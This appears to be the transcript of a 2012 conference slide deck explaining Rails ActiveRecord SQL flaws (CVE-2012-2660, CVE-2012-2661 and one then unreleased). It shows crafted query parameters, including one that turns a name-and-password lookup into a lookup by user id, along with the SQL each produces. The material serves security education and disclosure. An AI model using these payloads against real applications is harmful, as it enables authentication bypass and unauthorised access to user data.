Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

"Recent Rails SQL Issues" - 2012

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

Other Decks in Programming

Transcript

  1. Rails Vulnerabilities
    Last Week
    CVE-2012-2660
    CVE-2012-2661

    View Slide

  2. CVE-2012-2660
    Allows unexpected “IS NULL” in queries
    Affects Rails 2.x and 3.x

    View Slide

  3. ActiveRecord Query
    unless params[:name].nil?
    @user = User.where(:name => params[:name])
    end

    View Slide

  4. Query Parameters
    ?name[]
    {"name"=>[nil]}

    View Slide

  5. ActiveRecord Query
    unless [nil].nil?
    @user = User.where(:name => [nil])
    end

    View Slide

  6. Resulting SQL
    SELECT "users".* FROM "users" WHERE
    "users"."name" IS NULL

    View Slide

  7. CVE-2012-2661
    Allows some manipulation of WHERE clause
    via “dotted” query keys
    Affects Rails 3.x

    View Slide

  8. ActiveRecord Query
    User.where(:name => params[:name])

    View Slide

  9. ActiveRecord Query
    User.where("users.name" => params[:name])

    View Slide

  10. Query Parameters
    ?name[users.id]=1
    {"name"=>{"users.id"=>"1"}}

    View Slide

  11. ActiveRecord Query
    User.where(:name => {"users.id" => "1"})

    View Slide

  12. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."
    id" = 1

    View Slide

  13. Unreleased Vulnerability
    Allows some manipulation of WHERE clause
    via nested hashes in query values
    Affects 2.3.x and 3.x

    View Slide

  14. ActiveRecord Query
    User.where(:name => params[:name],
    :password => params[:password])

    View Slide

  15. Query Parameters
    ?name[users][id]=1&password[users][id]=1
    {"name"=>{"users"=>{"id"=>"1"}}, "password"
    =>{"users"=>{"id"=>"1"}}}

    View Slide

  16. ActiveRecord Query
    User.where(
    :name => {"users"=>{"id"=>"1"},
    :password => {"users"=>{"id"=>"1"} )

    View Slide

  17. Resulting SQL
    SELECT "users".* FROM "users" WHERE "users"."
    id" = 1 AND "users"."id" = 1

    View Slide